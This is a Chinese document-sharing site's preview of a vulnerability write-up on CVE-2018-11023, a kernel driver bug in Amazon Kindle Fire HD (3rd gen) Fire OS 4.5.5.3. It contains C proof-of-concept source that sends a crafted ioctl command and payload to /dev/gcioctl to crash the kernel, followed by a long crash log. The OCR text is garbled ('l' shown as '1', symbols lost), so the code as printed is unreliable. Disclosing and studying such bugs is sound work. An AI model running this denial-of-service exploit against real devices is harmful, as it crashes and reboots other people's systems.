收藏
下载资源 加入VIP,免费下载

(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人:lao****ou 文档编号:794870 上传时间:2024-05-25 格式:DOCX 页数:7 大小:34.23KB
下载 相关 举报
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第1页
第1页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第2页
第2页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第3页
第3页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第4页
第4页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第5页
第5页 / 共7页
亲,该文档总共7页,到这儿已超出免费预览范围,如果喜欢就下载吧!
资源描述

《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(7页珍藏版)》请在第一文库网上搜索。

1、(CVE-2018-11023)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3的内核组件中的内核模块omapdriversmiscgcxgcioct1gcif.c允许攻击者通过设备/dev上ioct1的参数注入特制参数/gcioct1使用命令3222560159,并导致内核崩溃。二、漏洞影响FireOS4.5.5.3三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevgci

2、oct1causesthesystemcrashviaIOCT13222560159.* ThisPocshou1drunwithpermissiontodoioct1ondevgcioct1.*/#inc1ude#inc1ude#inc1ude#inc1udeconststaticchar*driver=,devgcioct1;staticcommand=3222560159;intmain(intargcjchar*argv,char*env)unsignedintpay1oad=0x244085aa,01a03e6ef0x000003f4,0x00000000;intfd=0;fd=OP

3、en(driver,O_RDON1Y);if(fddata1oca1tmp1og);return-1;printf(Tryopen%swithcommand0x%x.n”,driver,command);printf(Systemwi11crashandreboot.n);if(ioct1(fdcommand,Spay1oad)data1oca1tmp1og);return-1;c1ose(fd);return0;崩溃日志79.825592init:untrackedpid3232exited79.830841init:untrackedpid3234exited95.970855A1ignm

4、enttrap:nothand1inginstructione1953f9fatf395.978912Unhand1edfau1t:a1ignmentexception(0001)at0x1a03e695.986053Interna1error:1#1PREEMPTSMPARM95.991638Modu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogger(0)1)95.999145CPU:0Tainted:GO(3.4.83-gd2afc0bae69#96.006408PCisat_raw_spin_1ock_irqsave+0x38/0xb096.01211

5、51Risat_raw_spin_1ock_irqsave+0x10/0x1496.017791pc:1r:psr:2000009396.017822sp:d02bfdd8ip:d02bfdf8fp:d02bfdf496.030578r10:00000000r9:dd3eeca8r8:000000010096.036376r7:Ia03e6efr6:00000001r5:Ia03e6f3r4:d02be01396.043701r3:00000001r2:00000001r1:00000082r0:20000096.050933F1ags:nzCvIRQsoffFIQsonModeSVC_32I

6、SAARMSegmentuser96.058990Contro1:10c5387dTab1e:96cb804aDAC:0000001596.06546096.065460PC:0xc06a4d08:96.0704044d081a000003eaffffe6e5903000e35300000affffe3e5903004e3530000996.0808104d28eaffffdfe50b0018ebfffbabe51b0018eaffffede1a0c00de92dd800e24cb00496.0912174d48ebffffcfe89da800e1a0c00de92dd878e24cb004e

7、1a0300de3c34d7fe3c4403f96.1017764d68e1a05000e3a06001e5943004e2833001e5843004e10f0000f10c0080e1953f9f96.1123354d88e333000001853f96e35300000a000014e121f000e5943004e2433001e584300496.1228944da8e5943000e31300021a000010e5953004e3530000e595300005856004e353000096.1333614dc81a000003eaffffe7e5953000e35300000

8、affffe4e5953004e3530000Iafffff996.1439204de8eaffffe0f57ff05fe5853004e89da878ebfffb79eaffffeee1a0c00de92dd80096.15447996.1544791R:0xc06a4d90:96.1593934d90e35300000a000014e121f000e5943004e2433001e5843004e5943000e313000296.1700134db01a000010e5953004e3530000e595300005856004e35300001a000003eaffffe796.180

9、6034dd0e5953000e35300000affffe4e5953004e3530000Iafffff9eaffffe0f57ff05f96.1910704df0e5853004e89da878ebfffb79eaffffece1a0c00de92dd800e24cb004ebffffcf96.2016904e10e89da800e1a0c00de92dd800e24cb004ebfffff6e89da800e1a0c00de92dd80096.2123414e30e24cb004ebfffff1e89da800e1a0c00de92dd818e24cb004ebffffc0e1a040

10、0096.2228084e50ebe6a978e121f004e89da818e1a0c00de92dd800e24cb004ebfffff3e89da80096.2336124e70e1a0c00de92dd830e24cb004e24dd008e1a0300de3c34d7fe3c4403fe3a0500196.24426296.244262SP:0xd02bfd58:96.249145fd58000000000000001d00000004d4736f80d4737394C06a4d8420000093ffffffff96.259948fd78d02bfdc400000001d02bfd

11、f4d02bfd90C06a5318C0008370200000130000008296.270660fd980000000100000001d02be000Ia03e6f3000000011a03e6ef00000001dd3eeca896.281311fdb800000000d02bfdf4d02bfdf8d02bfdd8C06a4e10C06a4d8820000093ffffffff96.292053fdd80000020a00000082Ia03e6f3d02be000d02bfe04d02bfdf8C06a4e10C06a4d5c96.302825fdf8d02bfe14d02bfe

12、08C06a4e24C06a4e0cd02bfe5cd02bfe18C06a3008C06a4e2096.313415fe18d84a38d8d84a2800d84a38000000000ad02be000c33a3180d02bfe54Ia03e6ef96.323883fe38bed24608d02b000d627f000bed24608dd3eeca800000000d02bfe6cd02bfe6096.33453396.334533IP:0d02bfd78:96.339416fd78d02bfdc400000001d02bfdf4d02bfd90C06a5318C000837020000

13、0130000008296.349853fd980000000100000001d02be000Ia03e6f3000000011a03e6ef00000001dd3eeca896.360290fdb800000000d02bfdf4d02bfdf8d02bfdd8C06a4e10C06a4d8820000093ffffffff96.370727fdd80000020a00000082Ia03e6f3d02be000d02bfe04d02bfdf8C06a4e10C06a4d5c96.381042fdf8d02bfe14d02bfe08C06a4e24C06a4e0cd02bfe5cd02bf

14、e18C06a3008C06a4e2096.391479fe18d84a38d8d84a2800d84a38000000000ad02be000c33a3180d02bfe54Ia03e6ef96.402008fe38bed24608d02be000d627f000bed24608dd3eeca800000000d02bfe6cd02bfe6096.412445fe58C06a319cc06a2fecd02bff04d02bfe70C0317c28c06a3194000000010000002896.42279096.422790FP:0xd02bfd74:96.427795fd74ffffffffd02bfdc400000001d02bfdf4d

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 应用文档 > 工作总结

copyright@ 2008-2022 001doc.com网站版权所有   

经营许可证编号:宁ICP备2022001085号

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有,必要时第一文库网拥有上传用户文档的转载和下载权。第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第一文库网,我们立即给予删除!



客服